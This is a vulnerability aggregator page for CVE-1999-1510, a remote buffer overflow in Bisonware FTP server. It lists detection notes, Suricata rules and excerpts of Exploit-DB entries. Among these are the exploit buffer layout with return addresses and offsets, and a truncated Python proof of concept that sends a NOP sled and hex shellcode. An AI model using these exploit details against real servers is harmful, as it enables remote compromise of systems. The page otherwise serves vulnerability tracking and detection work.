CVE-1999-1510
published 1999-05-17CVE-1999-1510: Buffer overflows in Bisonware FTP server prior to 4.1 allow remote attackers to cause a denial of service, and possibly execute arbitrary commands, via long…
PriorityP342high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
67.09%
99.2th percentile
Buffer overflows in Bisonware FTP server prior to 4.1 allow remote attackers to cause a denial of service, and possibly execute arbitrary commands, via long (1) USER, (2) LIST, or (3) CWD commands.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| bisonware | bisonware_ftp_server | <= 4.1 | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect buffer overflow attempts against BisonFTP via oversized USER or PASS commands: strings exceeding 550 characters in USER/PASS FTP commands indicate exploitation attempt. ↗
- →Detect buffer overflow attempts via oversized LIST or CWD FTP commands: strings longer than 1500 characters in LIST or CWD arguments indicate exploitation attempt. ↗
- →Metasploit module exploit buffer structure: 1028 random alpha bytes + 16 NOP bytes + encoded payload + NOP padding + return address 0x0040333f + 39 random alpha bytes, sent to BisonFTP on default FTP port. ↗
- →Detect PORT command followed by large amounts of carriage returns and newlines as a DoS vector against BisonFTP. ↗
- →Bad characters for payload encoding are null byte, line feed, and carriage return; their absence in a large FTP command argument may indicate a crafted exploit buffer. ↗
- ·The return address 0x0040333f (call edx in Bisonftp.exe) is specific to the Windows XP SP3 English target; the alternate return address 0x7e3c5c9a (jmp edx in shell32.dll) targets Windows XP SP3 Spanish. Exploits will fail against other OS versions/languages. ↗
- ·Payload space is constrained to 388 bytes with bad characters \x00, \x0a, \x0d excluded; shellcodes containing these bytes will not function. ↗
- ·The overflow offset for the Metasploit module is 1432 bytes for Windows XP SP3 EN; the standalone Python PoC uses a 1092-byte NOP sled suggesting a different effective offset calculation. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Suricata
GPL FTP USER overflow attempt
suricata·2010-09-23
CVE-1999-1510 GPL FTP USER overflow attempt
GPL FTP USER overflow attempt
Rule: alert ftp $EXTERNAL_NET any -> $HOME_NET any (msg:"GPL FTP USER overflow attempt"; flow:established,to_server,no_stream; content:"USER|20|"; nocase; isdataat:100,relative; pcre:"/^USER\x20[^\x00\x20\x0a\x0d]{100}/smi"; reference:bugtraq,10078; reference:bugtraq,1227; reference:bugtraq,1504; reference:bugtraq,1690; reference:bugtraq,4638; reference:bugtraq,7307; reference:bugtraq,8376; reference:cve,1999-1510; reference:cve,1999-1514; reference:cve,1999-1519; reference:cve,1999-1539; reference:cve,2000-0479; reference:cve,2000-0656; reference:cve,2000-0761; reference:cve,2000-0943; reference:cve,2000-1035; reference:cve,2000-1194; reference:cve,2001-0256; reference:cve,2001-0794; reference:cve,2001-0826; reference:cve,2002-0126; reference:cve,2002-1522;
Suricata
GPL FTP CWD overflow attempt
suricata·2010-09-23
CVE-1999-0219 GPL FTP CWD overflow attempt
GPL FTP CWD overflow attempt
Rule: alert ftp $EXTERNAL_NET any -> $HOME_NET any (msg:"GPL FTP CWD overflow attempt"; flow:established,to_server; content:"CWD"; nocase; isdataat:100,relative; pcre:"/^CWD\s[^\n]{100}/smi"; reference:bugtraq,11069; reference:bugtraq,1227; reference:bugtraq,1690; reference:bugtraq,6869; reference:bugtraq,7251; reference:bugtraq,7950; reference:cve,1999-0219; reference:cve,1999-1058; reference:cve,1999-1510; reference:cve,2000-1035; reference:cve,2000-1194; reference:cve,2001-0781; reference:cve,2002-0126; reference:cve,2002-0405; classtype:attempted-admin; sid:2101919; rev:25; metadata:created_at 2010_09_23, cve CVE_1999_0219, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08;)
Exploit-DB
BisonWare BisonFTP Server 3.5 - Remote Buffer Overflow (Metasploit)
exploitdb·2011-09-09
CVE-1999-1510 BisonWare BisonFTP Server 3.5 - Remote Buffer Overflow (Metasploit)
BisonWare BisonFTP Server 3.5 - Remote Buffer Overflow (Metasploit)
---
##############################################################################
#
# Title : BisonFTP Server Remote Buffer Overflow Exploit
# Author : Veerendra G.G SecPod Technologies (www.secpod.com)
# Advisory : http://secpod.org/blog/?p=384
# http://secpod.org/msf/bison_server_bof.rb
# Version : BisonFTP Server 'BisonFTP Server Remote Buffer Overflow Vulnerability',
'Description' => %q{
This module exploits a buffer overflow vulnerability
found in the BisonFTP Server
[
'localh0t', # Initial PoC
'veerendragg @ SecPod', # Metasploit Module
],
'License' => MSF_LICENSE,
'Version' => '$Revision: 1.0 $',
'References' =>
[
[ 'BID', '49109'],
[ 'CVE', '1999-1510'],
[ 'URL', 'http://secpod.org/blog/?p=384'],
[ 'URL', 'http:
Exploit-DB
BisonWare BisonFTP Server 3.5 - Remote Buffer Overflow
exploitdb·2011-08-10
CVE-1999-1510 BisonWare BisonFTP Server 3.5 - Remote Buffer Overflow
BisonWare BisonFTP Server 3.5 - Remote Buffer Overflow
---
#!/usr/bin/python
# BisonFTP Server \n" %(sys.argv[0])
sys.exit()
print "\n[!] Connecting to %s ..." %(sys.argv[1])
# connect to host
sock = socket(AF_INET,SOCK_STREAM)
sock.connect((sys.argv[1],int(sys.argv[2])))
sock.recv(1024)
time.sleep(5)
# padding
buffer = "\x90" * 1092
# 368 bytes shellcode
buffer += ("\x33\xc9\x83\xe9\xaa\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"+
"\xbb\xc1\x9c\x35\x83\xee\xfc\xe2\xf4\x47\x29\x15\x35\xbb\xc1"+
"\xfc\xbc\x5e\xf0\x4e\x51\x30\x93\xac\xbe\xe9\xcd\x17\x67\xaf"+
"\x4a\xee\x1d\xb4\x76\xd6\x13\x8a\x3e\xad\xf5\x17\xfd\xfd\x49"+
"\xb9\xed\xbc\xf4\x74\xcc\x9d\xf2\x59\x31\xce\x62\x30\x93\x8c"+
"\xbe\xf9\xfd\x9d\xe5\x30\x81\xe4\xb0\x7b\xb5\xd6\x34\x6b\x91"+
"\x17\x7d\xa3\x4a\xc4\x15\xba\x12\x7f\x09
Exploit-DB
BisonWare BisohFTP Server 3.5 - Multiple Vulnerabilities
exploitdb·1999-05-17
CVE-1999-1510 BisonWare BisohFTP Server 3.5 - Multiple Vulnerabilities
BisonWare BisohFTP Server 3.5 - Multiple Vulnerabilities
---
// source: https://www.securityfocus.com/bid/271/info
Multiple vulnerabilities in the BisonWare FTP Server can cause denials of service.
The vulnerabilities are:
The server fails to close the socket created by a PASV command in multiple PASV commands are executed back to back. This can create a socket and memory shortage that will not be fixed when the client disconnects from the server.
Connecting to the server and issuing a "PORT a" command followed by several thousand carriege returns and new lines will cause the server to crash.
The are multiple buffer overflows in all commands that take arguments. For example LIST and CWD both crash the server if they are passed string longer than 1500 characters.
The USER command in
Metasploit
BisonWare BisonFTP Server Buffer Overflow
metasploit
BisonWare BisonFTP Server Buffer Overflow
BisonWare BisonFTP Server Buffer Overflow
BisonWare BisonFTP Server 3.5 is prone to an overflow condition. This module exploits a buffer overflow vulnerability in the said application.
No writeups or analysis indexed.
1999-05-17
Published